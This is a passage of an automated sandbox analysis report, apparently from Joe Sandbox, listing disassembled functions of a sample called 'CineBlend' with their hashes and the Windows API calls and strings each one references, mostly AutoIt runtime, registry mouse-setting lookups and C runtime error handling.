Opcode ID: 857fced6f43a39b9fc45b7434877b7809b07ca47ffa80f83ddd212c1c49ecd45
Instruction ID: 930bd7509c4010c3258c8d3145444245219dbd04e347740a0cb4b97c4806134d
Opcode Fuzzy Hash: 857fced6f43a39b9fc45b7434877b7809b07ca47ffa80f83ddd212c1c49ecd45
Instruction Fuzzy Hash: 7D415971900205EFDF04AF58DC85AAAB7B8FF05310F1484A5FA00AB296DB74DE51DBA0

Function 00B42793 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 153
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B4327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B432AF
Part of subcall function 00B4327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00B432B7
Part of subcall function 00B4327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B432C2
Part of subcall function 00B4327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B432CD
Part of subcall function 00B4327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00B432D5
Part of subcall function 00B4327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00B432DD

Part of subcall function 00B43205: RegisterWindowMessageW.USER32(00000004,?,00B42964), ref: 00B4325D

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00B42A0A
OleInitialize.OLE32 ref: 00B42A28
CloseHandle.KERNELBASE(00000000,00000000), ref: 00B83A0D

Strings

I, xrefs: 00B42852
(I, xrefs: 00B4284D

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: (I$I
API String ID: 1986988660-552130911
Opcode ID: 452574a6f0cef26836626ad94f23b2c9383a437d227d1de4ca15fb58de794267
Instruction ID: c6d746ee31d29ad3fd5968176add7fed6e7c6b0df0a5dfb8846254895fd1cbba
Opcode Fuzzy Hash: 452574a6f0cef26836626ad94f23b2c9383a437d227d1de4ca15fb58de794267
Instruction Fuzzy Hash: 17719DB99112008ED788EF79ECA57DD7AE6FB4B304340C1AAE048C73A1EB704565EF54

Function 00B7316B Relevance: 7.6, APIs: 5, Instructions: 53
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(76F82E40,?,?,00B6F64E,00B73BD6,?,?,00B60165,?,?,00BB11D9,0000FFFF), ref: 00B73170
_free.LIBCMT ref: 00B731A5
_free.LIBCMT ref: 00B731CC
SetLastError.KERNEL32(00000000), ref: 00B731D9
SetLastError.KERNEL32(00000000), ref: 00B731E2

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: c1116eb66f9268fb0709951de5f7dac162b47ae469c16c4d6578ae0a03db6eba
Instruction ID: 0929761100ec44e3a63a5cd9d1ab31f60ea1fa06e0fce6d2c7da9b0b52ec0a94
Opcode Fuzzy Hash: c1116eb66f9268fb0709951de5f7dac162b47ae469c16c4d6578ae0a03db6eba
Instruction Fuzzy Hash: 5E01D176685A007B96122734AC85E6A27E9EFD1B7276184A9F83DB2582EE218A016121

Function 00B461A9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B85287

Part of subcall function 00B48577: _wcslen.LIBCMT ref: 00B4858A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B46299

Strings

AutoIt - , xrefs: 00B4620D
Line %d: , xrefs: 00B85305

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line %d: $AutoIt -
API String ID: 2289894680-4094128768
Opcode ID: ae95062539471e333de9d8e39f5c9a8197c3a74dbd3d9fc18398e36c0194c622
Instruction ID: 6f655d6ef4887cefda077a1efdae41cd46dfe92d4f9c6a78f2dc83eafe0dfae3
Opcode Fuzzy Hash: ae95062539471e333de9d8e39f5c9a8197c3a74dbd3d9fc18398e36c0194c622
Instruction Fuzzy Hash: 97416E71408204AAC721EB60EC85FDFB7ECEF55320F0046AAF599921A1EF749749DB93

Function 00B458CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00B458BE,SwapMouseButtons,00000004,?), ref: 00B458EF
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00B458BE,SwapMouseButtons,00000004,?), ref: 00B45910
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00B458BE,SwapMouseButtons,00000004,?), ref: 00B45932

Strings

Control Panel\Mouse, xrefs: 00B458ED

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: a1cc18050eee60a6c6d2c38eaff413cceca92051551a0fa900b519f415c889d0
Instruction ID: 73ea4134f3d07c4ed2cd78e070bf757d11270735e75d244ffb10a3051bec8df7
Opcode Fuzzy Hash: a1cc18050eee60a6c6d2c38eaff413cceca92051551a0fa900b519f415c889d0
Instruction Fuzzy Hash: FD113C75511A18FFDB218F64DC84EAEBBF8EF45760F108499F845E7210E631AF41A760

Function 00B4F6D0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00B948C6

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 1b2265374f3f3ce7ab1be0ec97f4412b862ca6c3b8456b17bae91f8748acd92b
Instruction ID: 7fe97499db4c0d1f813160f2c55b6166169637aa2ebd8354af532b85ea3e7e30
Opcode Fuzzy Hash: 1b2265374f3f3ce7ab1be0ec97f4412b862ca6c3b8456b17bae91f8748acd92b
Instruction Fuzzy Hash: A6C25A71A00216DFCB24DF58C880BBDB7F1FF09314F2481A9E945AB2A1D775AE42DB91

Function 00B6014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00B609D8

Part of subcall function 00B63614: RaiseException.KERNEL32(?,?,?,00B609FA,76F82E40,?,?,?,?,?,?,?,00B609FA,?,00C09758), ref: 00B63674

__CxxThrowException@8.LIBVCRUNTIME ref: 00B609F5

Strings

Unknown exception, xrefs: 00B60A02

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 474b0e70e31f18306eb44497adb42b9b709aaf7af70f7bc15f04ceef9daa927b
Instruction ID: 7a9f5c4a384f32db2bd03298ae35bf6fdbdbf7f05dcc5faebe6dc6d0b84b1248
Opcode Fuzzy Hash: 474b0e70e31f18306eb44497adb42b9b709aaf7af70f7bc15f04ceef9daa927b
Instruction Fuzzy Hash: 3AF0C23492020DB7CF10BAAEDC4699F77EC9E01754B6041F0F924A65E2FBB8EA55C6D0

Function 00BC89B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00BC8D52
TerminateProcess.KERNEL32(00000000), ref: 00BC8D59
FreeLibrary.KERNEL32(?,?,?,?), ref: 00BC8F3A

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 722ab1783c3781367724aedc48a1cac3e461d3efe5c56c78198caa229a8e4388
Instruction ID: 4188a93236cc07d3e247491d88537994faacb8a511fb96d0ec2fae2fa03d7a3e
Opcode Fuzzy Hash: 722ab1783c3781367724aedc48a1cac3e461d3efe5c56c78198caa229a8e4388
Instruction Fuzzy Hash: 84126971A083019FD714DF28C484F6ABBE5FF88314F14899DE8899B292DB71ED45CB92

Function 00BC9AF3 Relevance: 4.7, APIs: 3, Instructions: 233COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BC9B87
_strcat.LIBCMT ref: 00BC9BC6
_wcslen.LIBCMT ref: 00BC9C14

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: _wcslen$_strcat
String ID:
API String ID: 306214811-0
Opcode ID: 1fec322f13d26338a43be47cfb09121694f2dfad55bf252cdb2469ac50517257
Instruction ID: 0311da1f04b988773ae00a0131b375d8fb1b6d5ecc51813dbc2038545a20390b
Opcode Fuzzy Hash: 1fec322f13d26338a43be47cfb09121694f2dfad55bf252cdb2469ac50517257
Instruction Fuzzy Hash: 77A17A31604605EFDB18DF18C5D5A6ABBE1FF45314B2084EDE81A9F292DB31EE42CB80

Function 00B78A2E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,00B7894C,?,00C09CE8,0000000C), ref: 00B78A84
GetLastError.KERNEL32(?,00B7894C,?,00C09CE8,0000000C), ref: 00B78A8E
__dosmaperr.LIBCMT ref: 00B78AB9

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 3939306e216388d733e63a09602f357e95524f69e491787e4a107cde3541992b
Instruction ID: 6cdf1596baf20b22e8005a4d80748592016b84eccdc61c162040c69422f7a392
Opcode Fuzzy Hash: 3939306e216388d733e63a09602f357e95524f69e491787e4a107cde3541992b
Instruction Fuzzy Hash: D00126326465A05AC6346278AC8EB7E67C9CB82734F2982DBF93C8F1D2DF708D814590

Function 00B7970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00B797BA,FF8BC369,00000000,00000002,00000000), ref: 00B79744
GetLastError.KERNEL32(?,00B797BA,FF8BC369,00000000,00000002,00000000,?,00B75ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00B66F41), ref: 00B7974E
__dosmaperr.LIBCMT ref: 00B79755

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 373a23d11199043c34098d93ad12c36f5ee0d6f03df969a64bc521060bd2fe81
Instruction ID: 2f88f269f4b47d0aae3afa5bc3d7bafca7f8356b641c925245fd4a196f5eb609
Opcode Fuzzy Hash: 373a23d11199043c34098d93ad12c36f5ee0d6f03df969a64bc521060bd2fe81
Instruction Fuzzy Hash: 5D014C33720515ABCB199F99EC45CAE7BA9EB85330B284289F8359B190EB70DD41CB90

Function 00BB0D18 Relevance: 4.5, APIs: 3, Instructions: 21COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000030,00000000,?,00000002,00000000,?,00BB0B03,00000000,?,00000000,?,00B83A00,00000000), ref: 00BB0D2E
GetCurrentProcess.KERNEL32(?,00000000,?,00BB0B03,00000000,?,00000000,?,00B83A00,00000000), ref: 00BB0D36
DuplicateHandle.KERNELBASE(00000000,?,00BB0B03,00000000,?,00000000,?,00B83A00,00000000), ref: 00BB0D3D

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CurrentProcess$DuplicateHandle
String ID:
API String ID: 1294930198-0
Opcode ID: 01f28bd5ad458d67052b22985c725202b565b75f0b639958488d55240b32a95e
Instruction ID: 7c653816df1b5ea57810feee097c3920fd4a8882324d1f2c8d4489196b987129
Opcode Fuzzy Hash: 01f28bd5ad458d67052b22985c725202b565b75f0b639958488d55240b32a95e
Instruction Fuzzy Hash: CED05E77151305BBC7022BD9EC19F7BBBBCEBC6B32F10406AFA4997190AEB094009625

Function 00B52B20 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00B53006

Strings

CALL, xrefs: 00B52FD6

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 401844581af15d520bc29da13aba720ca45f51a5cf47e9332d8c4f595372f584
Instruction ID: b419957e556399d2b6da4ad9fa286cef67fcbbcf618ff85f45f6ad8ca851e4c2
Opcode Fuzzy Hash: 401844581af15d520bc29da13aba720ca45f51a5cf47e9332d8c4f595372f584
Instruction Fuzzy Hash: EC2268706082419FC714DF24C885B2ABBF1FF89314F1489EDE8959B3A1DB71E949CB82

Function 00B43A95 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00B8413B

Part of subcall function 00B45851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B455D1,?,?,00B84B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00B45871

Part of subcall function 00B43A57: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B43A76

Strings

X, xrefs: 00B84109

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: bd4d1a1eaba048944a9814dbe593b7fdfcce4cd3c96489f7192230a8307f836a
Instruction ID: 07cbdc4548602ca91afc7d061eb31d34a3fad33af7475ae3681d2fb36aa574b1
Opcode Fuzzy Hash: bd4d1a1eaba048944a9814dbe593b7fdfcce4cd3c96489f7192230a8307f836a
Instruction Fuzzy Hash: DC21AE71A002589BCF01DF94C805BEE7BFCAF49314F008099E545A7281DBB89A89DFA1

Function 00B5FFE0 Relevance: 3.1, APIs: 2, Instructions: 94COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 00B6007D
SetErrorMode.KERNELBASE ref: 00B6008F

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CloseErrorHandleMode
String ID:
API String ID: 3953868439-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 75c16c936857e82661a5e5b1b043bf322daf43ff0fbe2cb48048a69e9463c761
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: A431D271A10109DFC718EF5AD490A6AFBE6FB59300B2486E5E409CB652D73AEDC1CBC0

Function 00B4396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B43A3C

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 2e6bc64f8ac1311f155fe784a2b56346a595beb44481e891080408423c0d7bae
Instruction ID: 8e2c24ec3dc250cb3c3e402a5a5f4bd8925b4fa689368193d750fd22f3788ddd
Opcode Fuzzy Hash: 2e6bc64f8ac1311f155fe784a2b56346a595beb44481e891080408423c0d7bae
Instruction Fuzzy Hash: 6831A5705047018FE720DF24D8847DBBBE8FB49718F04096EF6DA87251E775AA58CB52

Function 00B74EB8 Relevance: 3.1, APIs: 2, Instructions: 67COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00B74F04
GetFileType.KERNELBASE(00000000), ref: 00B74F16

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 235f419cd6c6260150ac23f7224d7c67fc5766651e980e3cbc8e9919c01a0f90
Instruction ID: fe7ee7218ee33ee235d9b5d2620f7d7a65154fd945d1355c35a54f4e8f411f48
Opcode Fuzzy Hash: 235f419cd6c6260150ac23f7224d7c67fc5766651e980e3cbc8e9919c01a0f90
Instruction Fuzzy Hash: 1711B1311087518AC7348A3D9C88622AAD4EB97332F39879AD5BFCB5F1C734D9829241

Function 00BB0AC4 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00000018,00000FA0,?,00000000,?,00B83A00,00000000), ref: 00BB0AEC
InterlockedExchange.KERNEL32(00000038,00000000), ref: 00BB0B0E

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
String ID:
API String ID: 4104817828-0
Opcode ID: 2a482d4259e38cc0cbc92c9f6e3b0f2947ab1d0fb6241637c5a5c9ef41bd1356
Instruction ID: 0d5a6ae00e5e50556fc7c5e707276a97a41efe0352c98b6db8a8781788fbedf2
Opcode Fuzzy Hash: 2a482d4259e38cc0cbc92c9f6e3b0f2947ab1d0fb6241637c5a5c9ef41bd1356
Instruction Fuzzy Hash: C6F012B16017059BC320AF5AD9448A7FBECFF94720B40882EE58687A60DBB4B085CB90

Function 00B4331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00B4333D

Part of subcall function 00B432E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00B432FB
Part of subcall function 00B432E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B43312

Part of subcall function 00B4338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00B43368,?), ref: 00B433BB
